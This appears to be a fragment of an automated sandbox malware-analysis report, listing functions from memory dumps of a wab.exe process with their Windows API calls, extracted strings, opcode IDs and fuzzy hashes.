                                                  • Source File: 00000005.00000002.3282193553.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_5bd0000_wab.jbxd
                                                  Similarity
                                                  • API ID: CreateWindow
                                                  • String ID: 9u5$9u5
                                                  • API String ID: 716092398-1842006184
                                                  • Opcode ID: ed50fdc321702ed74af1937093d4083802391a8774df9f6ebdd67a30eaf8b433
                                                  • Instruction ID: 540fd53ba3889644d821843e9619c010c6cf93ffc180278a542b0501270f7af9
                                                  • Opcode Fuzzy Hash: ed50fdc321702ed74af1937093d4083802391a8774df9f6ebdd67a30eaf8b433
                                                  • Instruction Fuzzy Hash: 2B51B0B1D003499FDB14CF9AC884ADEFBB5FF49314F24816AE819AB210D774A945CF90
                                                  APIs
                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05BD7202
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3282193553.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_5bd0000_wab.jbxd
                                                  Similarity
                                                  • API ID: CreateWindow
                                                  • String ID: 9u5$9u5
                                                  • API String ID: 716092398-1842006184
                                                  • Opcode ID: dc1471c86fdb0def1c0000b958d3c430238a7d0420af3d0a062497eac96a4b5c
                                                  • Instruction ID: 66fc9d1ed41cd918a51e7aa800cd4eff543154c5e3071871ef54ff4271b19eff
                                                  • Opcode Fuzzy Hash: dc1471c86fdb0def1c0000b958d3c430238a7d0420af3d0a062497eac96a4b5c
                                                  • Instruction Fuzzy Hash: 2051AFB1D003499FDB14CF9AC884ADEFBB5FF49314F64816AE819AB250DB74A845CF90
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3307348599.0000000024490000.00000040.00000800.00020000.00000000.sdmp, Offset: 24490000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_24490000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $Haq$Haq$Haq
                                                  • API String ID: 0-432640594
                                                  • Opcode ID: 865aab8f7c3a767ce9449e63d0f443a51bd8245932ee34172cc2a9d0df7ebd63
                                                  • Instruction ID: d452812be08150b1eddca4685755cf8e893e7e424b159618c228b2847f6b4764
                                                  • Opcode Fuzzy Hash: 865aab8f7c3a767ce9449e63d0f443a51bd8245932ee34172cc2a9d0df7ebd63
                                                  • Instruction Fuzzy Hash: 9DB1AE347042049FDF15AF3888585AE3FE6EF8A324F214669E916CB3D1CE798D41DB92
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3307348599.0000000024490000.00000040.00000800.00020000.00000000.sdmp, Offset: 24490000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_24490000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $Haq$Haq$Haq
                                                  • API String ID: 0-432640594
                                                  • Opcode ID: 7fe41ac026f10b8b2eefd887ae7adbff5a44b72423c53d8f20539767a69ee5df
                                                  • Instruction ID: 0c10530870d3d33ae3ddf7e229342e3c5f4085117719a9a11e97af2220cdda4e
                                                  • Opcode Fuzzy Hash: 7fe41ac026f10b8b2eefd887ae7adbff5a44b72423c53d8f20539767a69ee5df
                                                  • Instruction Fuzzy Hash: 5E81BE34B042049FDF15AF78C8585AE3FA6FF9A324B1141AAE516CB3D1CE398D01DB92
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_28b0000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: `Bm!xIm!PNm!$$]q$$]q
                                                  • API String ID: 0-2513829293
                                                  • Opcode ID: 707ed938de1bc9044d8666d582adb78b185c1b78b52c9a51284dc49e10ea98b3
                                                  • Instruction ID: 4b901f977f0ee4a669fa640ae7ad5bbf9d50ead01c51b4a280dbf8a754094b18
                                                  • Opcode Fuzzy Hash: 707ed938de1bc9044d8666d582adb78b185c1b78b52c9a51284dc49e10ea98b3
                                                  • Instruction Fuzzy Hash: 60524478A0021C9FEB559BA8C850B9EBB7BFF84300F1080ADC54AAB365DB359D45DF52
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 05BD4D5E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3282193553.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_5bd0000_wab.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID: 9u5
                                                  • API String ID: 4139908857-632338590
                                                  • Opcode ID: 8db01c215dde83a9a57ec7a5885ac361a0bb9acdcc286974aba7c5b0aa70892e
                                                  • Instruction ID: b98820371365f412a69e49473c0ec4a0724d7556c769bf848e6068a596e298ea
                                                  • Opcode Fuzzy Hash: 8db01c215dde83a9a57ec7a5885ac361a0bb9acdcc286974aba7c5b0aa70892e
                                                  • Instruction Fuzzy Hash: 7A8145B0A00B058FDB24DF29D14576ABBF6FF88304F008969D48AD7A50EB75F805CBA1
                                                  APIs
                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 05BD9771
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3282193553.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_5bd0000_wab.jbxd
                                                  Similarity
                                                  • API ID: CallProcWindow
                                                  • String ID: 9u5
                                                  • API String ID: 2714655100-632338590
                                                  • Opcode ID: 978b74b4c1306dd2837fcf5654ab9b0653b335d00ed9b34c61c81c21071d0ef8
                                                  • Instruction ID: 027e31c80a056802ab85a45deb4f6057566daa38c12cad9a2c8ee16cb9b1428c
                                                  • Opcode Fuzzy Hash: 978b74b4c1306dd2837fcf5654ab9b0653b335d00ed9b34c61c81c21071d0ef8
                                                  • Instruction Fuzzy Hash: D2411EB5A00209CFCB54DF99C488AAAFBF5FF89314F24C499D519A7321D375A845CFA0
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,05BD4DD9,00000800,00000000,00000000), ref: 05BD53CA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3282193553.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_5bd0000_wab.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID: 9u5
                                                  • API String ID: 1029625771-632338590
                                                  • Opcode ID: 8cc4f09dbe51442e1bcbc2d652a8658abc61489a53654e9aec37dbdbfd2ccc2a
                                                  • Instruction ID: e26c237bb236b4a5a0a2808e81ff2d746478ab1abed5df7ed9135c5cefdd412f
                                                  • Opcode Fuzzy Hash: 8cc4f09dbe51442e1bcbc2d652a8658abc61489a53654e9aec37dbdbfd2ccc2a
                                                  • Instruction Fuzzy Hash: 861117B69043098FCB20CF9AD444A9EFBF4FB89320F10845ED91AA7250D3B5A545CFA5
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,05BD4DD9,00000800,00000000,00000000), ref: 05BD53CA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3282193553.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_5bd0000_wab.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID: 9u5
                                                  • API String ID: 1029625771-632338590
                                                  • Opcode ID: be765210c1438db68670b9474f7101e33c33384500e4c405087eefd03599bdce
                                                  • Instruction ID: c1a2ab9191020857219e929c8841789e47ac4ed9e08746c2dc4cbbb5d1f2f3d7
                                                  • Opcode Fuzzy Hash: be765210c1438db68670b9474f7101e33c33384500e4c405087eefd03599bdce
                                                  • Instruction Fuzzy Hash: A71129B69003498FCB10CFAAD444ADEFBF4EF88310F14846ED919A7240C375A545CFA5
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 05BD4D5E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3282193553.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_5bd0000_wab.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID: 9u5
                                                  • API String ID: 4139908857-632338590
                                                  • Opcode ID: 6bee39b5cc6c0ebb8e7063d4817637319e1f44b8f32e54531cf994329fe0f4d6
                                                  • Instruction ID: e31193c94a4ef0111b805f61ced5fcf8317d6cc0e2cffa8e0cd3f381251953f6
                                                  • Opcode Fuzzy Hash: 6bee39b5cc6c0ebb8e7063d4817637319e1f44b8f32e54531cf994329fe0f4d6
                                                  • Instruction Fuzzy Hash: 4C11F2B6C006498FCB10CF9AD444ADEFBF4EF89314F10845AD829B7210D3B9A945CFA1
                                                  APIs
                                                  • OleInitialize.OLE32(00000000), ref: 05BDBD7D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3282193553.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_5bd0000_wab.jbxd
                                                  Similarity
                                                  • API ID: Initialize
                                                  • String ID: 9u5
                                                  • API String ID: 2538663250-632338590
                                                  • Opcode ID: eccf0ee8adb88ad938f578e34e7da011fb96b754c2abe46b20be1231cc861e70
                                                  • Instruction ID: 039d639f4363bd53f2216a640784b3f05e9c48b989553ce00c0ff9a366fe48da
                                                  • Opcode Fuzzy Hash: eccf0ee8adb88ad938f578e34e7da011fb96b754c2abe46b20be1231cc861e70
                                                  • Instruction Fuzzy Hash: D71100B59047488FCB20DF9AD549B9EFBF4EF48324F20845AE519A7210D378A944CFA5
                                                  APIs
                                                  • OleInitialize.OLE32(00000000), ref: 05BDBD7D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3282193553.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_5bd0000_wab.jbxd
                                                  Similarity
                                                  • API ID: Initialize
                                                  • String ID: 9u5
                                                  • API String ID: 2538663250-632338590
                                                  • Opcode ID: 50d41bf900c34a9b4b4fcbac5044538166eecbccfa27627fac9dca2aca0877f7
                                                  • Instruction ID: 9b720fc81f5d8a430833f22761fd730bad42c21af22cdcba6fed3a1feedc283a
                                                  • Opcode Fuzzy Hash: 50d41bf900c34a9b4b4fcbac5044538166eecbccfa27627fac9dca2aca0877f7
                                                  • Instruction Fuzzy Hash: BE1130B5C00208CFCB20CF9AD549B9EFBF4AF48320F20845AD919A7210D378A944CFA1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_28b0000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Haq$Haq
                                                  • API String ID: 0-4016896955
                                                  • Opcode ID: bf8d14521588cc7277ef5f6dbbc9e46e581435328e22ca73393b3f2d253272a9
                                                  • Instruction ID: 193ecb438b7f5232fe2c4decddfae1d9d04898142b2430c68f47745d76148fa7
                                                  • Opcode Fuzzy Hash: bf8d14521588cc7277ef5f6dbbc9e46e581435328e22ca73393b3f2d253272a9
                                                  • Instruction Fuzzy Hash: 45B1D578B042259FDB169F29C854BBE7BE6AF89305F14446DE80ACB391DB34C842CB91
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_28b0000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ,aq$,aq
                                                  • API String ID: 0-2990736959
                                                  • Opcode ID: 2899bfc7505738ebd8cb3026fb20784a06e1f316158a0d5e06e796c9158c9047
                                                  • Instruction ID: e75e512b590211cd6b073367a38c18888d4338fbaaefb6f5e9c92ed4be38c588
                                                  • Opcode Fuzzy Hash: 2899bfc7505738ebd8cb3026fb20784a06e1f316158a0d5e06e796c9158c9047
                                                  • Instruction Fuzzy Hash: E381A03CA005259FCB16CF79C8849EEBBBABF8A218B14816DD409D7366E731EC45CB51
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_28b0000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4']q$4']q
                                                  • API String ID: 0-3120983240
                                                  • Opcode ID: bad9df4218df829c0cf9c45b87119f07c09b3f9eacd2800b01b6f5bc8d0fb493
                                                  • Instruction ID: 44559c05f13459e5ed219701104852230e515b301028440f199e173f01fe0871
                                                  • Opcode Fuzzy Hash: bad9df4218df829c0cf9c45b87119f07c09b3f9eacd2800b01b6f5bc8d0fb493
                                                  • Instruction Fuzzy Hash: 3951A3387042489FDB02DF69C844BAE7BE6EF89314F188469EA08CB355D775EC01CB61
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_28b0000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Xaq$Xaq
                                                  • API String ID: 0-1488805882
                                                  • Opcode ID: cc89b88cfbb3cc65329e3e037445820981e76c29dc04dacb8ddcf435e68b3d61
                                                  • Instruction ID: e3eaff3dca1874ae19443cdbb2e64c7a1a92087893009a3270e4797be0afdd96
                                                  • Opcode Fuzzy Hash: cc89b88cfbb3cc65329e3e037445820981e76c29dc04dacb8ddcf435e68b3d61
                                                  • Instruction Fuzzy Hash: 1F315C3DB442654BDF1A4A7989A43FEAAA6AFC4204F1C447EE81AC3390DB75DC48C751
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3307348599.0000000024490000.00000040.00000800.00020000.00000000.sdmp, Offset: 24490000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_24490000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 8bq$TJbq
                                                  • API String ID: 0-3440557903
                                                  • Opcode ID: 644c9701392b7d0c0946e8205f452b866da456a0299635738b1c4870de5661c2
                                                  • Instruction ID: 0bb4d4ddf34784e7ec286bf04f920c4d5da88d17d6a797d7fb468c5dfde34003
                                                  • Opcode Fuzzy Hash: 644c9701392b7d0c0946e8205f452b866da456a0299635738b1c4870de5661c2
                                                  • Instruction Fuzzy Hash: 0E311178B001088FCB45DBA8C580E9EBBF6EF88320F195494E505EB365DA34ED46CFA1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3307348599.0000000024490000.00000040.00000800.00020000.00000000.sdmp, Offset: 24490000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_24490000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 8bq$TJbq
                                                  • API String ID: 0-3440557903
                                                  • Opcode ID: b1dd331d3a57a90346028c8b41641d3ce423e6f244b004d3e7af70a64400f6b1
                                                  • Instruction ID: ccb354cd9be3c1ebbd84ddb17e4fcda77d29e9063bcd50a5356038cff4f3bd97
                                                  • Opcode Fuzzy Hash: b1dd331d3a57a90346028c8b41641d3ce423e6f244b004d3e7af70a64400f6b1
                                                  • Instruction Fuzzy Hash: FE311234B001088FCB45DBA8C990E9EBBB6EF88320F1954A4E505AB365DA74ED46CF91
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_28b0000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 3w#$;m!
                                                  • API String ID: 0-2518558843
                                                  • Opcode ID: 28940ea6ae2b38d9f4d6f549721094e53d5f047e7b277799b817976b78dd3b21
                                                  • Instruction ID: 73fb51f9f324dc5c93b4c70ce0ca3530e04dd2ea90f3acd333b4865ef013756b
                                                  • Opcode Fuzzy Hash: 28940ea6ae2b38d9f4d6f549721094e53d5f047e7b277799b817976b78dd3b21
                                                  • Instruction Fuzzy Hash: AE21F23D7446229FC7268A29C85893EB7A6EFC9755718807DD81ACB794DF34DC02CB81
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_28b0000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4']q$4']q
                                                  • API String ID: 0-3120983240
                                                  • Opcode ID: beccf36e85cd7b25fa73f518f7fae896dfe1c9c925b83c3007dce6c5d8e85043
                                                  • Instruction ID: f4ef1629ddf0a029c6b9e893d065bff26f32a1f5d3d9ffa5cd8bbd5580b91c98
                                                  • Opcode Fuzzy Hash: beccf36e85cd7b25fa73f518f7fae896dfe1c9c925b83c3007dce6c5d8e85043
                                                  • Instruction Fuzzy Hash: 26F0A4393001042FDB0A1EAB9C509BEBADFEFC9360B144429FA09C7351DE65CC0187A1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3307348599.0000000024490000.00000040.00000800.00020000.00000000.sdmp, Offset: 24490000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_24490000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Haq
                                                  • API String ID: 0-725504367
                                                  • Opcode ID: e222eacb57e23c3b59573a481bc329c7c9f556737eb103ea7814d9b07c95362a
                                                  • Instruction ID: 5a8f169a46cac11621a013ffff1b282f19be1d6d5e3903e41579e5b25452aaef
                                                  • Opcode Fuzzy Hash: e222eacb57e23c3b59573a481bc329c7c9f556737eb103ea7814d9b07c95362a
                                                  • Instruction Fuzzy Hash: 3351C031B082589FCB15DFB8C854AAE7FE6EF9A300F5440AED505CB296CA348D02D761
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3307348599.0000000024490000.00000040.00000800.00020000.00000000.sdmp, Offset: 24490000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_24490000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Haq
                                                  • API String ID: 0-725504367
                                                  • Opcode ID: 6a14c284dd3346a0ebd4d450a4da5667ebab5d416fe7921c6601163ceb273f9a
                                                  • Instruction ID: a56c4492fe6b5dd95463b5fbd73b2011c156422a704689804fb16a7411e54a00
                                                  • Opcode Fuzzy Hash: 6a14c284dd3346a0ebd4d450a4da5667ebab5d416fe7921c6601163ceb273f9a
                                                  • Instruction Fuzzy Hash: 7631C134B04244AFCB45EF78C890A6EBFA6FF89301F6080A9D5058B366CF359D06CB91
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_28b0000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: xIm!PNm!
                                                  • API String ID: 0-2935805194
                                                  • Opcode ID: 3bd636fc770c6a84cc445a3fc743b29311500bf29ab0434595a126050d432b9c
                                                  • Instruction ID: 602eef6c794f348e544722b2bad6d5a72446a7d649f6b79e27826ecf371a0d95
                                                  • Opcode Fuzzy Hash: 3bd636fc770c6a84cc445a3fc743b29311500bf29ab0434595a126050d432b9c
                                                  • Instruction Fuzzy Hash: 0A218B38E00249AFCB06CFA5C950AEEBFB6AF48304F248069E415E73A4DB35D945CF20
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_28b0000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5635a35cc01d1afd23ceaad03f9dee9a155b8b88fd7cee81502f4693f6a31bd0
                                                  • Instruction ID: 364b3bc44510093bb0c0ae3343b988624417a1c170eb143e50794bde25c275cd
                                                  • Opcode Fuzzy Hash: 5635a35cc01d1afd23ceaad03f9dee9a155b8b88fd7cee81502f4693f6a31bd0
                                                  • Instruction Fuzzy Hash: B722DD754A5242AFEB11AFB88AFC07EBF60FB1F3677756C81E05AC10419B390468CB61
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_28b0000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: af54d2be94beb4e8c80f572cfb7f9b033a740a6cfa17d65c0ff849c06dd97b42
                                                  • Instruction ID: 3d0c622233a52283710e05d130587879692c2b839de57aca68a04c6712b6ed15
                                                  • Opcode Fuzzy Hash: af54d2be94beb4e8c80f572cfb7f9b033a740a6cfa17d65c0ff849c06dd97b42
                                                  • Instruction Fuzzy Hash: 6922AA754A1252AFEB50AFB8DAFC03EBB64FB1F367375AC81E05AC10419B790464CB61
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_28b0000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9c0fbf3d50b6f273cf5defb6d21a1f2dd660b3df82ca2a02e5df81aa48056929
                                                  • Instruction ID: 075e56fb07c32dfc9f8d71a77d29dbaaa0e0135ee36454b675b9af0f390a8937
                                                  • Opcode Fuzzy Hash: 9c0fbf3d50b6f273cf5defb6d21a1f2dd660b3df82ca2a02e5df81aa48056929
                                                  • Instruction Fuzzy Hash: 7A129A754A1252AFEB50AFB8DAFC03EBA64FB1F367375AD81E01BC10419B790464CB61
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3307348599.0000000024490000.00000040.00000800.00020000.00000000.sdmp, Offset: 24490000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_24490000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 57edd35d30c87a2f10114415e20f85d7c3a9e602461eaa67678b7cf6f8759e4f
                                                  • Instruction ID: 839cc0258cce12a89106df78b259abce0ee2a89689155b3767708563e192dd53
                                                  • Opcode Fuzzy Hash: 57edd35d30c87a2f10114415e20f85d7c3a9e602461eaa67678b7cf6f8759e4f
                                                  • Instruction Fuzzy Hash: FF61127AB04206AFCF14DF6DD89099ABFF6FB88324B54866AE519D7350D731D80187A0
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_28b0000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d063d4b773fc22089e75a3a98b7cb33a9529b37f5a5abae7ec1eba36c1cdcff2
                                                  • Instruction ID: 27de7cb35bfc387bc2a2f2649434569df403a1ab97a35180867112d7f52560e5
                                                  • Opcode Fuzzy Hash: d063d4b773fc22089e75a3a98b7cb33a9529b37f5a5abae7ec1eba36c1cdcff2
                                                  • Instruction Fuzzy Hash: D0711B3CB406058FCB26DF6CC884AAE7BEAAF89244F1540A9E819DB371DB74DC41CB51
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_28b0000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d1a1cf279a032fc1277f5e09c8ea38fd81b221a28b5798fd83657da2eb359978
                                                  • Instruction ID: f434cdeb011425d65e7a0955f303687748a7aa14a54c9b433d2fca2edf9f6583
                                                  • Opcode Fuzzy Hash: d1a1cf279a032fc1277f5e09c8ea38fd81b221a28b5798fd83657da2eb359978
                                                  • Instruction Fuzzy Hash: 62613278D00208CFDB14DFA5C944AEDBBB2FF88304F208569D809AB365DB795946CF41
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_28b0000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0d5a85c1dbf529f7a4be0275b29c10413d2774b63b4760cf596075527fa6a065
                                                  • Instruction ID: 1d95dcfb3ce9d00a0340ce3fa54f53e42e3efd8adc8d1594a233ce37fe130e28
                                                  • Opcode Fuzzy Hash: 0d5a85c1dbf529f7a4be0275b29c10413d2774b63b4760cf596075527fa6a065
                                                  • Instruction Fuzzy Hash: AA51A478E01218DFDB58DFA9D98499DBBF2FF89300F249469E819AB365DB319801CF41
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_28b0000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 465b70246b3596bd204e395ad287174e15d8837d760139e19dec66163ccb7139
                                                  • Instruction ID: 258ed9386948a54b82de0ef6499cb20d4118841a9099c4fe69c69d6842d55538
                                                  • Opcode Fuzzy Hash: 465b70246b3596bd204e395ad287174e15d8837d760139e19dec66163ccb7139
                                                  • Instruction Fuzzy Hash: 7E51A879E01208DFCB09DFA9D99099DBBF2FF89304B208469D809AB364DB35AD45CF51
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_28b0000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f393707189f63e186e30e8efe5acf862c2cf904229469d42def24c4db62971fb
                                                  • Instruction ID: 45eedae839f0ddc1d18654e8ed508865dc3d9e4980f625f5767cacb17284e4a2
                                                  • Opcode Fuzzy Hash: f393707189f63e186e30e8efe5acf862c2cf904229469d42def24c4db62971fb
                                                  • Instruction Fuzzy Hash: 0B419E39A04249DFCF1ACFA8C844AEEBFB2AF49314F048559E909DB3A1D335E914CB50
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_28b0000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 033fee2672db0cb28cd3dfba6b422b103fc7d059e1ab03bee2d61f6036f77b5b
                                                  • Instruction ID: 872c532631189aecfd35caa02999d2492489b8e8d1eca59489aaa8809222c05e
                                                  • Opcode Fuzzy Hash: 033fee2672db0cb28cd3dfba6b422b103fc7d059e1ab03bee2d61f6036f77b5b
                                                  • Instruction Fuzzy Hash: 20316F79600209EFCF169F68C854ABE3BA6EF49300F504428F919C7344DB79C961DB92
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_28b0000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
